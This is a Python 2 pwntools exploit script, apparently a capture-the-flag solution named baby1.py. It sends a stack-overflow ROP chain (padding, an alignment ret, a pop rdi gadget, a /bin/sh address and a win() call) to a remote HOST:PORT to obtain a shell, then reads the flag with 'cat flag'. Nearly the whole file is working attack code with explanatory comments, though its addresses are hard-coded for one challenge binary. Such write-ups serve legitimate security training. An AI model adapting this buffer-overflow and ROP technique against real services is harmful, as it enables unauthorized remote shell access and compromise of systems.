0xb0bb/baby1.py

Created May 23, 2019
#!/usr/bin/env python2
from pwn import *
import sys
# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
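def fail(msg):
    """Log an exploit failure and terminate the process with exit status 1.

    Args:
        msg: text appended to the "Exploit failed: " log line.

    This never returns: ``sys.exit`` raises SystemExit, so a caller that
    must keep running has to catch it.
    """
    log.info("Exploit failed: {}".format(msg))
    # sys.exit is the documented API; the bare exit() builtin is installed by
    # the site module for interactive use and is missing under `python -S`.
    sys.exit(1)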
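def success(msg):
    """Log *msg* at success level and terminate the process with status 1337.

    Args:
        msg: the captured flag (or any message) to report.

    Note the exit status is non-zero; presumably a marker for an external
    harness rather than the conventional "0 = ok" -- confirm before keying
    anything off $?.
    """
    log.success("{}".format(msg))
    # sys.exit is the documented API; the bare exit() builtin is installed by
    # the site module for interactive use and is missing under `python -S`.
    sys.exit(1337)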
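def main():
    """Send the payload to the target named in sys.argv[1] and return the flag line.

    The target is taken from ``sys.argv[1]`` as ``host:port``; the caller is
    expected to have checked that the argument is present.

    Returns:
        The first line received after ``cat flag`` is sent, with surrounding
        whitespace stripped. No format check is done here; the caller
        validates the ``sctf{`` prefix.

    Raises:
        ValueError: if the argument does not contain exactly one ':'.
        SystemExit: via fail() when the remote side closes before a line
            comes back.
    """
    HOST, PORT = sys.argv[1].split(':')
    io = remote(HOST, PORT)
    try:
        # 24 bytes of padding, then the chain. Every address below is
        # hard-coded for this challenge binary (0x40... range), so the chain
        # is not expected to transfer to any other build of it.
        rop = cyclic(24)
        rop += p64(0x40053e)  # ret (for stack alignment so system() does not crash due to xmm SSE registers)
        rop += p64(0x400793)  # pop rdi ; ret
        rop += p64(0x400286)  # /bin/sh
        rop += p64(0x400698)  # win()
        # Echo the banner minus its last 7 bytes -- presumably trims a prompt
        # suffix; the exact prompt text is not visible here.
        print(io.recvuntil(': ')[:-7])
        io.sendline(rop)
        io.sendline('cat flag')
        try:
            flag = io.recvline().strip()
        except EOFError:
            # No line came back before the remote side closed; report through
            # the script's own failure path instead of an uncaught traceback.
            fail('connection closed before a flag line was received')
    finally:
        # Close the tube explicitly rather than relying on interpreter exit.
        io.close()
    return flag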
if __name__ == '__main__':
    # Usage: baby1.py HOST:PORT -- exits 1 on any failure, 1337 on a flag.
    if len(sys.argv) < 2:
        fail('No target')
    flag = main()
    # Anything not carrying the expected prefix is treated as a failed run.
    if not flag.startswith("sctf{"):
        fail("")
    success(flag)